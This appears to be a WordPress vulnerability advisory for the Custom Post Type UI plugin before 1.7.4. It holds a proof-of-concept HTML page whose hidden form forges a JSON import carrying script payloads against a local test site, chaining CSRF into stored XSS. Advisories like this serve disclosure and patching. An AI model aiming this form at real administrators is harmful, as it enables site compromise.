Custom Post Type UI < 1.7.4 - CSRF to Stored XSS



Description
The Custom Post Type UI WordPress plugin was vulnerable to Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) within the "Import Post Types" functionality in the "Tools" tab. This functionality allows users to import "Post Types" from other websites, or from backup, as JSON. This could allow an attacker to execute arbitrary JavaScript in a victim's browser, if the attacker could entice the authenticated victim to visit a page they controlled. If successfully exploited, this vulnerability could lead to full site compromise.
Proof of Concept
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://jetpack.local/wp-admin/admin.php?page=cptui_tools" method="POST">
      <input type="hidden" name="cptui&#95;post&#95;import" value="&#123;&quot;slug&quot;&#58;&#123;&quot;name&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;label&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;singular&#95;label&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;description&quot;&#58;&quot;&lt;script&gt;alert&#40;1&#41;&lt;&#92;&#47;script&gt;&quot;&#44;&quot;public&quot;&#58;&quot;true&quot;&#44;&quot;publicly&#95;queryable&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;ui&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;in&#95;nav&#95;menus&quot;&#58;&quot;true&quot;&#44;&quot;delete&#95;with&#95;user&quot;&#58;&quot;false&quot;&#44;&quot;show&#95;in&#95;rest&quot;&#58;&quot;true&quot;&#44;&quot;rest&#95;base&quot;&#58;&quot;&quot;&#44;&quot;rest&#95;controller&#95;class&quot;&#58;&quot;&quot;&#44;&quot;has&#95;archive&quot;&#58;&quot;false&quot;&#44;&quot;has&#95;archive&#95;string&quot;&#58;&quot;&quot;&#44;&quot;exclude&#95;from&#95;search&quot;&#58;&quot;false&quot;&#44;&quot;capability&#95;type&quot;&#58;&quot;post&quot;&#44;&quot;hierarchical&quot;&#58;&quot;false&quot;&#44;&quot;rewrite&quot;&#58;&quot;true&quot;&#44;&quot;rewrite&#95;slug&quot;&#58;&quot;&quot;&#44;&quot;rewrite&#95;withfront&quot;&#58;&quot;true&quot;&#44;&quot;query&#95;var&quot;&#58;&quot;true&quot;&#44;&quot;query&#95;var&#95;slug&quot;&#58;&quot;&quot;&#44;&quot;menu&#95;position&quot;&#58;&quot;&quot;&#44;&quot;show&#95;in&#95;menu&quot;&#58;&quot;true&quot;&#44;&quot;show&#95;in&#95;menu&#95;string&quot;&#58;&quot;&quot;&#44;&quot;menu&#95;icon&quot;&#58;&quot;&quot;&#44;&quot;supports&quot;&#58;&#91;&quot;title&quot;&#44;&quot;editor&quot;&#44;&quot;thumbnail&quot;&#93;&#44;&quot;taxonomies&quot;&#58;&#91;&#93;&#44;&quot;labels&quot;&#58;&#123;&quot;menu&#95;name&quot;&#58;&quot;&quot;&#44;&quot;all&#95;items&quot;&#58;&quot;&quot;&#44;&quot;add&#95;new&quot;&#58;&quot;&quot;&#44;&quot;add&#95;new&#95;item&quot;&#58;&quot;&quot;&#44;&quot;edit&#95;item&quot;&#58;&quot;&quot;&#44;&quot;new&#95;item&quot;&#58;&quot;&quot;&#44;&quot;view&#95;item&quot;&#58;&quot;&quot;&#44;&quot;view&#95;items&quot;&#58;&quot;&quot;&#44;&quot;search&#95;items&quot;&#58;&quot;&quot;&#44;&quot;not&#95;found&quot;&#58;&quot;&quot;&#44;&quot;not&#95;found&#95;in&#95;trash&quot;&#58;&quot;&quot;&#44;&quot;parent&#95;item&#95;colon&quot;&#58;&quot;&quot;&#44;&quot;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;set&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;remove&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;use&#95;featured&#95;image&quot;&#58;&quot;&quot;&#44;&quot;archives&quot;&#58;&quot;&quot;&#44;&quot;insert&#95;into&#95;item&quot;&#58;&quot;&quot;&#44;&quot;uploaded&#95;to&#95;this&#95;item&quot;&#58;&quot;&quot;&#44;&quot;filter&#95;items&#95;list&quot;&#58;&quot;&quot;&#44;&quot;items&#95;list&#95;navigation&quot;&#58;&quot;&quot;&#44;&quot;items&#95;list&quot;&#58;&quot;&quot;&#44;&quot;attributes&quot;&#58;&quot;&quot;&#44;&quot;name&#95;admin&#95;bar&quot;&#58;&quot;&quot;&#44;&quot;item&#95;published&quot;&#58;&quot;&quot;&#44;&quot;item&#95;published&#95;privately&quot;&#58;&quot;&quot;&#44;&quot;item&#95;reverted&#95;to&#95;draft&quot;&#58;&quot;&quot;&#44;&quot;item&#95;scheduled&quot;&#58;&quot;&quot;&#44;&quot;item&#95;updated&quot;&#58;&quot;&quot;&#125;&#44;&quot;custom&#95;supports&quot;&#58;&quot;&quot;&#125;&#125;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

fixed in version 1.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2263231/custom-post-type-ui

Classification

Type MULTI

Miscellaneous

Views 3674
Verified No
WPVDB ID 10138

Timeline

Publicly Published 2020-03-17 (4 months ago)
Added 2020-03-20 (4 months ago)
Last Updated 2020-03-23 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin